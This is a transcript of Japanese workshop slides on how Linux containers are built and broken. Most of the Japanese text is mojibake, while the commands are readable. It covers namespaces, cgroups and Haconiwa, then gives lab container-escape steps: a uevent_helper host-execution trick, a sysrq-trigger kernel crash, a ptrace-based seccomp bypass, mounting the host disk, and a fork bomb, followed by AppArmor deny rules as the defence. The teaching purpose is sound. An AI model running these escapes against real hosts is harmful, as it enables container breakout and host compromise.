コンテナの作り方、壊し方 / Container Structure and Exploitation Method

B49933741d74e122bc1314b2975e9fc9?s=47 mrtc0
November 10, 2018

コンテナの作り方、壊し方 / Container Structure and Exploitation Method

セキュリティ・ミニキャンプ2018 in 愛媛での資料です。 #seccamp

B49933741d74e122bc1314b2975e9fc9?s=128

mrtc0

November 10, 2018
Tweet

Transcript

  1. ίϯςφͷ࡞Γํɺյ͠ํ ίϯςφͷηΩϡϦςΟΛ஌Ζ͏ ৿ాߒฏ !NSUD (.01FQBCP *OD ηΩϡϦςΟɾϛχΩϟϯϓJOѪඤ

  2. (.0ϖύϘηΩϡϦςΟରࡦࣨ ৿ాߒฏ!NSUD ,PIFJ.PSJUB IUUQTCMPHTTSGJO

  3. ೥ʹηΩϡϦςΟΩϟϯϓશࠃେձʹࢀՃ ೥ΑΓ4&$$0/#FHJOOFSTߨࢣ େֶࡏֶத͸ΠΤϥΤηΩϡϦςΟʹͯ8FC੬ऑੑ਍அʢΞϧόΠτʣ ೥౓*1"ະ౿ΫϦΤΠλʔ ೥ʹ(.0ϖύϘגࣜձࣾʹೖࣾ

  4. TFDDBNQ

  5. ͸͡Ίʹ wຊεϥΠυ͸ʮ۝भηΩϡϦςΟΧϯϑΝϨϯεʯͰಉ྅ͷۙ౻Ӊஐ࿕͞Μ @udzura ͱൃදͨ͠಺༰ΛҰ෦վมͨ͠΋ͷͰ͋Δ wʮίϯςφͷηΩϡϦςΟΛத਎͔Βཧղ͠Α͏ʯ wIUUQTTQFBLFSEFDLDPNVE[VSBJOTJEFPVUDPOUBJOFSBOEJUTTFDVSJUZ wεϥΠυͷར༻ͷڐՄΛ௖͖ɺҰ෦վม͍ͯ͠·͢ wշ୚௖͍ͨ!VE[VSB͞Μʹײँ͍ͨ͠·͢

  6. ͸͡Ίʹ wԋशϝΠϯͳͷͰɺࠔͬͨΒۙ͘ͷਓɺνϡʔλʔ͞ΜΛཔΓ·͠ΐ͏ wίϚϯυ͕ࣦഊ͢Δɺૢ࡞͕Θ͔Βͳ͍ͳͲ͸ɺͲΜͲΜฉ͍͍ͯͩ͘͞ wνʔτγʔτΛ༻ҙ͍ͯ͠ΔͷͰ͝׆༻͍ͩ͘͞ wάϧʔϓͷਓͱ࿩͠ͳ͕ΒਐΊͯ0,Ͱ͢ wੵۃతʹձ࿩͍ͯͩ͘͠͞ʂ

  7. "HFOEB ίϯςφԾ૝Խͱ͸ʁ ίϯςφͷ࢓૊ΈΛͷ͍ͧͯΈΑ͏ ίϯςφΛ࡞ͬͯΈΑ͏ ίϯςφͷηΩϡϦςΟϞσϧͱ"UUBDL4VSGBDFT ίϯςφΛյͦ͏

  8. ࠓ೔ͷΰʔϧ ίϯςφͷ࢓૊ΈΛͬ͘͟Γཧղ͠Α͏ ίϯςφͷηΩϡϦςΟػߏΛ஌Ζ͏ εΠʔενʔζϞσϧΛମݧ͠Α͏

  9. ίϯςφԾ૝Խͱ͸ʁ

  10. ࣍ͷιϑτ΢ΣΞΛ ࢖ͬͨ͜ͱ͕͋Δํʁ

  11. None
  12. None
  13. None
  14. Ծ૝Խ 7JSUVBMJ[BUJPO

  15. ͍ΘΏΔԾ૝Խ ϋʔυ΢ΣΞ ϗετ04ϋΠύʔόΠβ )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO ήετ04

    ήετ04 ήετ04 ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ
  16. ͍ΘΏΔԾ૝Խ ϋʔυ΢ΣΞ ϗετ04ϋΠύʔόΠβ )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO )BSEXBSF &NVMBUJPO ήετ04

    ήετ04 ήετ04 ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ
  17. ίϯςφԾ૝Խ ϋʔυ΢ΣΞ ϗετ04 -JOVY ίϯςφΤϯδϯ ίϯςφΤϯδϯ ίϯςφΤϯδϯ ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ

    ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ 04ͷػೳ͸ڞ௨Ͱ࢖༻ ϗετͱಉ͡,FSOFMΛ࢖͏
  18. ίϯςφ͸Ͳ͜Ͱ࢖ΘΕ͍ͯΔ͔

  19. ίϯςφ͕ͲͷΑ͏ʹ࢖ΘΕ͍ͯΔ͔ IUUQTFOXJLJQFEJBPSHXJLJ,VCFSOFUFT

  20. ίϯςφͷηΩϡϦςΟ  ίϯςφϥϯλΠϜࣗମͷ࣮૷  ίϯςφͷηΩϡϦςΟϙϦγʔ  ίϯςφͷωοτϫʔΫ  ΦʔέετϨʔγϣϯϚωʔδυαʔϏε

  21. ίϯςφͷ࣮૷

  22. -9$ )"$0/*8" SLU

  23. ίϯςφͷϝϦοτ QSPT

  24. ίϯςφͷϝϦοτ  ىಈ͕ߴ଎ɺܰྔ  ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ

  25. ίϯςφͷϝϦοτ  ىಈ͕ߴ଎ɺܰྔ  ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ Ϋϥ΢υʹ޲͍͍ͯΔ ΞϓϦέʔγϣϯΛؙ͝ͱίϯςφԽɺߴ଎ͳσϓϩΠɺ։ൃ

  26. ίϯςφͷσϝϦοτ DPOT

  27. ݖݶ෼཭ Ϧιʔεޮ཰ ϋΠύʔόΠβܕ ιϑτ΢ΣΞܕ ίϯςφܕ ݖݶ෼཭͕ऑ͍

  28. ίϯςφͷத਎Λͷ͍ͧͯΈΑ͏ IUUQTqJDLSQBB,5I

  29. ίϯςφ͸Ͳ͏΍ͬͯ ίϯςφʹͳ͍ͬͯΔͷ͔ʁ

  30. ࣍ͷը໘Λݟͨ͜ͱ͕͋Δํʁ

  31. None
  32. None
  33. ϓϩηε 1SPDFTT

  34. ίϯςφ͸ϓϩηε

  35. $ ./a.out BPVU -JOVYΧʔωϧ ϥΠϒϥϦ γεςϜίʔϧ

  36. BPVU $ ps xf -C a.out 3262 ? S 0:00

    sshd: vagrant@pts/2 3263 pts/2 Ss 0:00 \_ -bash 3372 pts/2 S+ 0:00 \_ ./a.out
  37. BPVU $ ps xf -C a.out 3262 ? S 0:00

    sshd: vagrant@pts/2 3263 pts/2 Ss 0:00 \_ -bash 3372 pts/2 S+ 0:00 \_ ./a.out
  38. $ ./a.out ࢠϓϩηε ਌ϓϩηε CBTIͳͲ ৽͍͠ϓϩάϥϜ fork(2) wait(2) execve(2) execve(“/bin/cat”,

    …)
  39. $ ./a.out ࢠϓϩηε ਌ϓϩηε CBTIͳͲ ৽͍͠ϓϩάϥϜ fork(2) wait(2) execve(2) ಛघͳॲཧ

  40. ίϯςφ͸ ಛघͳ ϓϩηε

  41. ී௨ͷϓϩηεͱίϯςφͷҧ͍ w ίϯςφ͸ಛघͳϓϩηε w ۩ମతʹ͸ ɹ ϗετ͔Βಠཱͨ͠ϦιʔεۭؒΛ෇༩͠ ɹ ϗετ͔Βར༻Ͱ͖Δϋʔυ΢ΣΞϦιʔεͳͲʹ੍ݶΛ༩͑Δ ɹ͜ͱͰݸผʹಠཱͨ͠࡞ۀۭؒΛ֬อ͍ͯ͠ΔΠϝʔδ

  42. ී௨ͷϓϩηεͱίϯςφͷҧ͍ w ίϯςφ͸ಛघͳϓϩηε w ۩ମతʹ͸ ɹ ϗετ͔Βಠཱͨ͠ϦιʔεۭؒΛ෇༩͠ ɹ ϗετ͔Βར༻Ͱ͖Δϋʔυ΢ΣΞϦιʔεͳͲʹ੍ݶΛ༩͑Δ ɹ͜ͱͰݸผʹಠཱͨ͠࡞ۀۭؒΛ֬อ͍ͯ͠ΔΠϝʔδ

    -JOVY /BNFTQBDF DHSPVQT
  43. ʮίϯςφ͸ϓϩηεͰ͋Δʯ ͜ͱΛ֬ೝ

  44. %PDLFSίϯςφͷىಈ $ docker ps -a CONTAINER ID IMAGE COMMAND 4521880cffa8

    minicamp-1 "/usr/sbin/apache2ct…" $ docker start 4521 $ curl localhost:8080 -s | grep '<title>' <title>Apache2 Ubuntu Default Page: It works</title>
  45. ϓϩηεπϦʔΛ֬ೝ $ ps auxf $ sudo apt-get install apache2 &&

    sudo systemctl start apache2  %PDLFS͕࡞ΔϓϩηεπϦʔΛݟΑ͏  ϗετͰ௚઀BQBDIFΛ্ཱͪ͛ͯΈͯϓϩηεπϦʔΛݟΑ͏
  46. -JOVY/BNFTQBDF

  47. -JOVY/BNFTQBDFΛ֬ೝ͢Δ $ docker ps CONTAINER ID IMAGE COMMAND 4521880cffa8 minicamp-1

    “/usr/sbin/apache2ct…" $ docker exec -ti 45 bash # ίϯςφʹʮΞλονʯ͢Δ # ip a # ίϯςφ಺෦ͷωοτϫʔΫΛ֬ೝ͢Δ # exit # ίϯςφ͔Βൈ͚ͯ $ ip a # ϗετͷωοτϫʔΫͱൺֱ͢Δ
  48. $ ip a # ϗετଆ 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500

    qdisc pfifo_fast state UP group default qlen 1000 link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3 valid_lft forever preferred_lft forever inet6 fe80::40:c1ff:fefa:9bf5/64 scope link valid_lft forever preferred_lft forever # ip a # Dockerίϯςφଆ 10: eth0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0 valid_lft forever preferred_lft forever
  49. $ ip a # ϗετଆ 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500

    qdisc pfifo_fast state UP group default qlen 1000 link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3 valid_lft forever preferred_lft forever inet6 fe80::40:c1ff:fefa:9bf5/64 scope link valid_lft forever preferred_lft forever # ip a # Dockerίϯςφଆ 10: eth0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0 valid_lft forever preferred_lft forever ίϯςφ͸ಉ͡Ϛγϯʹ͋Δϓϩηε ʹ΋͔͔ΘΒͣɺಠཱͨ͠ωοτϫʔΫ͕౰͍ͨͬͯΔ
  50. ଞͷ-JOVY/BNFTQBDF΋֬ೝ͢Δ $ docker exec -ti 45 hostname 4521880cffa8 $ hostname

    ubuntu-xenial w ϗετ໊΋ҟͳ͍ͬͯΔ͜ͱΛ֬ೝͯ͠ΈΑ͏
  51. ଞͷ-JOVY/BNFTQBDF΋֬ೝ͢Δ w ϓϩηεʹ͸ϓϩηε*% 1*% ͕͋Δ͕ɺͦͷ࠾൪͕ʮಠཱʯ͍ͯ͠Δ w ಉ͡1*%ʹҧ͏ϓϩηεׂ͕Γ౰ͯΒΕ͍ͯΔ͜ͱΛ֬ೝ͠Α͏ $ docker exec

    -ti 45 ps auxf $ ps auxf
  52. Πϝʔδ host-1 192.168.1.1/24 container-1 172.16.1.1/24 container-2 10.1.1.1/24 ϗετ04 -JOVY ίϯςφ

    ίϯςφ w ʮϓϩηεΛ෼཭ʯ͍ͯ͠Δɻ04ͷػೳ͸ϗετͱڞ༗ɻ
  53. /BNFTQBDF͸ Ͳ͜Ͱ֬ೝ͢Δʁ

  54. /BNFTQBDFΛݟΔ $ ps auxf | grep -A 10 docker[d] ϗετ͔Βݟͨίϯςφͷ"QBDIFͷ1*%Λ֬ೝ͠Α͏

    $ sudo ls -l /proc/$PID/ns ҎԼͷσΟϨΫτϦΛௐ΂Δ $ sudo ls -l /proc/self/ns ϗετͷํ͸Ͳ͏ͳͷ͔ௐ΂ͯ໨EJ⒎͠Α͏
  55. $ sudo ls -l /proc/3625/ns total 0 lrwxrwxrwx 1 root

    root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835] lrwxrwxrwx 1 root root 0 Nov 3 03:08 ipc -> ipc:[4026532276] lrwxrwxrwx 1 root root 0 Nov 3 03:08 mnt -> mnt:[4026532274] lrwxrwxrwx 1 root root 0 Nov 3 02:55 net -> net:[4026532279] lrwxrwxrwx 1 root root 0 Nov 3 03:08 pid -> pid:[4026532277] lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837] lrwxrwxrwx 1 root root 0 Nov 3 03:08 uts -> uts:[4026532275] $ sudo ls -l /proc/self/ns total 0 lrwxrwxrwx 1 root root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835] lrwxrwxrwx 1 root root 0 Nov 3 03:45 ipc -> ipc:[4026531839] lrwxrwxrwx 1 root root 0 Nov 3 03:45 mnt -> mnt:[4026531840] lrwxrwxrwx 1 root root 0 Nov 3 03:45 net -> net:[4026531957] lrwxrwxrwx 1 root root 0 Nov 3 03:45 pid -> pid:[4026531836] lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837] lrwxrwxrwx 1 root root 0 Nov 3 03:45 uts -> uts:[4026531838] ໨EJ⒎͠Α͏
  56. &OUFSUIF/BNFTQBDF w ωοτϫʔΫۭؒͷΈʹΞλονͯ͠ΈΑ͏ JQBͷ݁Ռ͸%PDLFSϗετͱൺ΂ͯͲ͏ʁ IPTUOBNFͷ࣮ߦ݁Ռ͸ʁ $ sudo nsenter --net -t

    $PID $ sudo nsenter --uts -t $PID
  57. -JOVY/BNFTQBDF ໊લۭؒ ֓ཁ 1*%໊લۭؒ 1*%ͷ෼཭ Ϛ΢ϯτ໊લۭؒ ϑΝΠϧγεςϜπϦʔͷ෼཭ *1$໊લۭؒ *1$ͷ෼཭ ωοτϫʔΫ໊લۭؒ

    ωοτϫʔΫΠϯλʔϑΣΠεͷ෼཭ 654໊લۭؒ ϗετ໊ͷ෼཭ Ϣʔβʔ໊લۭؒ 6*%(*%ͷ෼཭
  58. DHSPVQ

  59. ίϯςφͷϝϦοτ  ىಈ͕ߴ଎ɺܰྔ  ϦιʔεΛॊೈʹࡉ੍͔͘ޚՄೳ

  60. ίϯςφͷϝϞϦׂΓ౰ͯΛ֬ೝ ϝϞϦͷׂ౰Λ֬ೝ͠Α͏ $ CID=$(docker inspect -f '{{.ID}}' 45) $ sudo

    cat /sys/fs/cgroup/memory/docker/$CID/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.limit_in_bytes ׂ౰ͷগͳ͍ίϯςφΛ࡞Γɺൺֱ͠Α͏ $ CID2=$(docker run --memory=8m -d minicamp-1); $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.usage_in_bytes $ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes
  61. ൺֱ͠Α͏ ੍ݶͷ༗ແͰίϯςφͷॲཧ଎౓͕ҟͳΔ͜ͱΛ֬ೝ͠Α͏ $ docker exec -ti $CID bash $ docker

    exec -ti $CID2 bash wBQUHFUVQEBUFΛ࣮ߦͯ͠ΈΑ͏ ௚઀ϝϞϦ࢖༻ྔΛมߋͯ͠ڍಈ͕վળ͢Δ͜ͱΛ֬ೝ͠Α͏ $ echo '128m' | sudo tee /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes $ docker exec -ti $CID2 bash root@d6a2825b878a:/# apt-get update
  62. DHSPVQTͰ੍ޚͰ͖Δ΋ͷ w $16 w ϝϞϦ w σΟεΫ*0ͷଳҬ w ϓϩηε਺ w

    FUDʜ
  63. ίϯςφΛ࡞ͬͯΈΑ͏ IUUQTqJDLSQBQH/#

  64. )BDPOJXB w @udzura (.0ϖύϘ ΒʹΑͬͯ։ൃ͞Εͨ-JOVYίϯςφϥϯλΠϜ w NSVCZͰઃఆ΍ϑοΫΛهड़Ͱ͖Δͷ͕ಛ௃ w IUUQTHJUIVCDPNIBDPOJXBIBDPOJXB $

    haconiwa version haconiwa: v0.9.5
  65. Πϝʔδ SPPUGT Λ࡞Δ $ mkdir /tmp/minicamp $ docker export 45

    | sudo tar -xv -f - -C /tmp/minicamp/ $ ls /tmp/minicamp/ bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
  66. ઃఆϑΝΠϧΛੜ੒ $ haconiwa init first-container.haco assign new haconiwa name =

    haconiwa-4ad5ea68 assign rootfs location = /var/lib/haconiwa/4ad5ea68 create first-container.haco
  67. ઃఆΛมߋ # -*- mode: ruby -*- Haconiwa.define do |config| #

    The container name and container's hostname: config.name = "haconiwa-4ad5ea68" # The first process when invoking haconiwa run: config.init_command = "/bin/bash" # If your first process is a daemon, please explicitly daemonize by: # config.daemonize! . . . # The rootfs location on your host OS # Pathname class is useful: root = Pathname.new(“/tmp/minicamp”) config.chroot_to root
  68. ίϯςφΛىಈ $ haconiwa run first-container.haco Create lock: #<Lockfile path=/var/lock/.haconiwa-4ad5ea68.hacolock> Container

    fork success and going to wait: pid=6855 groups: cannot find name for group ID 1000 root@haconiwa-4ad5ea68:/# ps ax PID TTY STAT TIME COMMAND 1 pts/3 S 0:00 /bin/bash 8 pts/3 R+ 0:00 ps ax
  69. εΫϥονͰ࡞Ζ͏

  70. ·ͣ͸GPSLFYFDWFDISPPU͚ͩͰ pid = Process.fork do Dir.chroot "/tmp/minicamp/" Dir.chdir "/" Exec.execve

    ENV, "/bin/bash" end p(Process.waitpid2 pid) $ hacorb test.rb bash-4.3$ pwd / bash-4.3$ ls bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
  71. 1*%໊લۭؒΛ෼཭ Namespace.unshare(Namespace::CLONE_NEWPID) pid = Process.fork do Dir.chroot "/tmp/minicamp/" Dir.chdir "/"

    Exec.execve ENV, "/bin/bash" end $ sudo hacorb test.rb bash-4.3$ mount -t proc proc /proc bash-4.3$ ps aux
  72. DHSPVQΛઃఆ limit = “3" Namespace.unshare(Namespace::CLONE_NEWPID) pid = Process.fork do Dir.mkdir

    "/sys/fs/cgroup/pids/minicamp" rescue nil system "echo #{limit} > /sys/fs/cgroup/pids/minicamp/pids.max" system "echo #{Process.pid} > /sys/fs/cgroup/pids/minicamp/tasks" Dir.chroot "/tmp/minicamp/" Dir.chdir "/" Exec.execve ENV, "/bin/bash" end $ sudo hacorb test.rb # ( echo 'test' | cat ) # bomb () { bomb | bomb & }; bomb
  73. ͜͜·Ͱͷ·ͱΊ w ίϯςφ͸ϗετ͔ΒݟΔͱ୯ͳΔϓϩηεͰ͋Δ w -JOVY͕࣋ͭίϯςφԽͷػೳΛ૊Έ߹Θ͍ͤͯΔ w ϓϩηεͷಠཱੑΛߴΊΔ /BNFTQBDF  w

    ϦιʔεΛׂΓ͋ͯΔʢDHSPVQ  w ͦΕҎ֎΋͋ΔΑ
  74. ෼΄Ͳٳܜ IUUQTqJDLSQQU,O/

  75. ίϯςφͷηΩϡϦςΟϞσϧͱ "UUBDL4VSGBDFT IUUQTqJDLSQB)9

  76. ίϯςφͷηΩϡϦςΟػߏ w -JOVY/BNFTQBDFʹΑΔ෼཭ w DHSPVQʹΑΔϦιʔε੍ޚ

  77. ίϯςφͷηΩϡϦςΟػߏ w -JOVY/BNFTQBDFʹΑΔ෼཭ w DHSPVQʹΑΔϦιʔε੍ޚ w "QQ"SNPS w TFDDPNQ w

    ಛఆͷϑΝΠϧͷύʔϛογϣϯΛམͱ͢
  78. ίϯςφԾ૝Խ ϋʔυ΢ΣΞ ϗετ04 -JOVY ίϯςφΤϯδϯ ίϯςφΤϯδϯ ίϯςφΤϯδϯ ϥΠϒϥϦ ϥΠϒϥϦ ϥΠϒϥϦ

    ϓϩάϥϜ ϓϩάϥϜ ϓϩάϥϜ 04ͷػೳ͸ڞ௨Ͱ࢖༻ ϗετͱಉ͡,FSOFMΛ࢖͏
  79. "UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ

  80. "UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ Χʔωϧͷ੬ऑੑΛಥ͘

  81. "UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ ☠ ίϯςφͷઃఆෆඋΛಥ͘ FHEPDLFSŠQSJWJMFHFE

  82. "UUBDL4VSGBDFT ,FSOFM $POUBJOFS $POUBJOFS $POUBJOFS 6TFS 4FDVSJUZ1PMJDZ ωοτϫʔΫͷઃఆෆඋΛಥ͘

  83. "UUBDL4VSGBDFT ,FSOFM 6TFS 4FDVSJUZ1PMJDZ ωοτϫʔΫͷઃఆෆඋΛಥ͘ $POUBJOFS $POUBJOFS $POUBJOFS

  84. εΠενʔζϞσϧ w ίϯςφͰར༻͞ΕΔηΩϡϦςΟػߏ͸ɺҰ෦ػೳ͕ॏෳ͍ͯ͠Δ΋ͷ΋͋Δ w $BQBCJMJUZͱTFDDPNQͷ྆ํͰಛఆͷγεςϜίʔϧΛېࢭ͍ͯͨ͠Γ w ͋Δػߏ͕#ZQBTT͞Εͯ͠·ͬͯ΋ɺผͷػߏͰ๷͙؇࿨͢Δ

  85. ίϯςφΛյͦ͏

  86. $POUBJOFS4FDVSJUZ 04Ϧιʔεͷ෼཭ 1SPDFTT pMFTZTUFN FUDʜ wDISPPUQJWPU@SPPU w-JOVY/BNFTQBDF wTFDDPNQ w-JOVY$BQBCJMJUZ wDHSPVQT

    w4&-JOVY"QQ"SNPS ݖݶػೳͷ੍ݶ QFSNJTTJPO TZTDBMM 04Ϧιʔεͷ੍ݶ $16 .FNPSZ ΞΫηείϯτϩʔϧ ಛఆͷϑΝΠϧ΁ͷΞΫηεېࢭʣ
  87. "QQ"SNPS

  88. "QQ"SNPS wίϯςφ͸ϗετͱҰ෦ͷϑΝΠϧΛڞ༗͍ͯ͠Δ wಡΈॻ͖͕Ͱ͖ΔͱϗετʹӨڹΛٴ΅͢ϑΝΠϧ΋͋Δ wFY /proc/kcore /proc/sysrq-trigger w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSͰ੍ޚ͍ͯ͠Δ w΋͠ॻ͖ࠐΊͨ৔߹ʹͲͷΑ͏ͳ͜ͱ͕ى͜Δͷ͔͔֬ΊͯΈΑ͏ʂ

  89. /sys/kernel/uevent_helper wuevent͸σόΠε͕௥Ճ࡟আ͞Εͨͱ͖ʹΧʔωϧ͕ૹ৴͢ΔΠϕϯτ wuevent͕ૹ৴͞Εͨͱ͖ʹɺuevent_helperʹॻ͖ࠐ·Ε͍ͯΔύεͷϓ ϩάϥϜΛ࣮ߦ͢Δ wuevent͸Ϣʔβʔϥϯυ͔Βૹ৴Մೳ •/sys/devices/virtual/mem/null/uevent •/sys/class/mem/null/uevent

  90. ίϯςφΛىಈͯ͠ઃఆ $ haconiwa start sample1.haco root@sample:/# echo “export PATH=$PATH” >>

    /root/.bashrc root@sample:/# bash root@sample:/# apt-get install gcc
  91. ίϯςφ͔Βൈ͚ग़ͯ͠ΈΑ͏ $ haconiwa start sample1.haco root@sample:/# cat /root/hello.sh # ޷͖ͳΤσΟλͰॻ͖ࠐΉ

    #!/bin/sh echo “Hello, Host! ;)” > /tmp/hello.txt root@sample:/# chmod +x /root/hello.sh root@sample:/# echo “/var/lib/haconiwa/sample/root/hello.sh” > /sys/kernel/uevent_helper
  92. ίϯςφ͔Βൈ͚ग़ͯ͠ΈΑ͏ $ ls /tmp/ root@sample:/# echo change > /sys/class/mem/null/uevent $

    ls /tmp hello.txt $ cat /tmp/hello.txt hello host! ;)
  93. QSPDTZTSRUSJHHFS root@sample1:/# echo c > /proc/sysrq-trigger w/proc/sysrq-triggerʹಛఆͷจࣈྻΛૹ৴͢Δ͜ͱͰϗετΛ࠶ىಈ͞ ͤͨΓΧʔωϧύχοΫΛىͨ͜͠ΓͰ͖Δ

  94. "QQ"SNPS deny /usr/bin/top mrwklx, # top ίϚϯυͷಡΈॻ͖࣮ߦΛېࢭ wϓϩάϥϜ୯ҐͰϑΝΠϧ΍ιέοτ΁ͷڧ੍ΞΫηε੍ޚ ."$ Λߦ͏

    wNSLXLMY͸ΞΫηεϞʔυΛද͠ɺS͸3FBE X͸XSJUF Y͸࣮ߦΛද͢ wIUUQNBOQBHFTVCVOUVDPNNBOQBHFTCJPOJDNBOBQQBSNPSE IUNM
  95. ๷͍ͰΈΑ͏ $ cat apparmor/haconiwa-test … deny /usr/bin/top mrwklx, deny @{PROC}/sysrq-trigger

    rwklx, … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏
  96. ๷͍ͰΈΑ͏ $ sudo cp apparmor/haconiwa-test /etc/apparmor.d/haconiwa/ $ sudo apparmor_parser -Kr

    \ /etc/apparmor.d/haconiwa/haconiwa-test $ cat sample1.haco … config.apparmor = "haconiwa-test" … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏
  97. ๷͍ͰΈΑ͏ $ haconiwa start sample1.haco root@sample1:/# top bash: /usr/bin/top: Permission

    denied root@sample1:/# echo c > /proc/sysrq-trigger bash: /proc/sysrq-trigger: Permission denied
  98. "QQ"SNPSʹΑΔอޢ w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSʹΑͬͯίϯςφͰར༻Ͱ͖Δί Ϛϯυͷ࣮ߦ΍ϑΝΠϧ΁ͷಡΈॻ͖Λ੍ݶͰ͖Δ •/proc/sysrq-trigger •/proc/sys/kernel/core_pattern •/proc/sys/kernel/modprobe •/sys/kernel/uevent_helper

  99. TFDDPNQ

  100. TFDDPNQ wγεςϜίʔϧͷϑΟϧλϦϯάΛߦ͏࢓૊Έ wϗετଆʹΤεέʔϓΛڐͯ͠͠·͏Α͏ͳةݥͳγεςϜίʔϧΛ๷͙ root@sample1:/# mkdir /tmp/hoge Bad system call

  101. TFDDPNQΛମݧ͠Α͏ $ cat sample2.haco config.seccomp.filter(default: :allow) do |rule| rule.kill :mkdir

    # mkdir(2) Λېࢭ end $ sudo haconiwa start sample2.haco root@sample1:/# mkdir /tmp/hoge Bad system call
  102. TZTDBMM LFYFD@MPBE JOJU@NPEVMF pOJU@NPEVMF EFMFUF@NPEVMF PQFO@CZ@IBOEMF@BU ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛ࡟আ

    ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘ ېࢭ͞Ε͍ͯΔγεςϜίʔϧ
  103. TFDDPNQͷCZQBTT wTFDDPNQϕʔεͷ4BOECPY؀ڥ͸Τεέʔϓ͢Δ͜ͱ͕Ͱ͖Δ wmkdir(2)͕ېࢭ͞Ε͍ͯͯ΋ճආͰ͖Δ wઈରʹptrace(2)ͷ࢖༻ΛڐՄͯ͠͸͍͚ͳ͍ʂ wτϨʔα͕ϓϩηεͷγεςϜίʔϧΛมߋͯ͠ϑΟϧλΛόΠύεͰ͖Δ wͨͩ͠-JOVY,FSOFMҎલͷόʔδϣϯͰ௨༻͢Δ

  104. TFDDPNQΛCZQBTTͯ͠ΈΑ͏ root@sample1:~/# ls bypass_seccomp.c root@sample1:~/# mkdir dir Bad system call

    root@sample1:~/# gcc bypass_seccomp.c root@sample1:~/# ./a.out root@sample1:~/# ls -al … drwxr-xr-x 2 root root 4096 Sep 10 12:27 dir # ࡞੒Ͱ͖ͨ
  105. NLEJS  TFDDPNQ Bad system call

  106. HFUQJE  TFDDPNQ QUSBDF getpid(2) Λݺͼग़͢ঢ়ଶʢϨδελʣΛ mkdir(2) Λݺͼग़͢ঢ়ଶʹมߋ NLEJS 

  107. QUSBDF  kill(getpid(), SIGSTOP); syscall(SYS_getpid, SYS_mkdir, "dir", 0777); if (regs.orig_rax

    == SYS_getpid) { regs.orig_rax = regs.rdi; regs.rdi = regs.rsi; regs.rsi = regs.rdx; regs.rdx = regs.r10; ptrace(PTRACE_SETREGS, pid, NULL, &regs); }
  108. -JOVY$BQBCJMJUZ

  109. wSPPUͷΈ͕࢖༻Ͱ͖ΔݖݶΛɺࡉ੍͔͘ޚͰ͖Δ࢓૊Έ wҰ෦͚ͩ෇༩ͨ͠Γ੍ݶͨ͠Γ DBQBCJMJUZ $"1@4:4@"%.*/ $"1@4:4@$)3005 $"1@4:4@153"$& $"1@/&5@3"8 $"1@4:4@#005 NPVOU 

    ͳͲ DISPPU   QUSBDF  3"8ιέοτ QJOHͳͲ SFCPPU  ͱLFYFD@MPBE  -JOVY$BQBCJMJUZ
  110. έΠύϏϦςΟΛମݧ͠Α͏ $ haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 PING 8.8.8.8

    (8.8.8.8) 56(84) bytes of data. 64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=5.54 ms ^C --- 8.8.8.8 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  111. έΠύϏϦςΟΛମݧ͠Α͏ root@sample1:/# mount /dev/sda1 /mnt/ root@sample1:/# cat /mnt/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

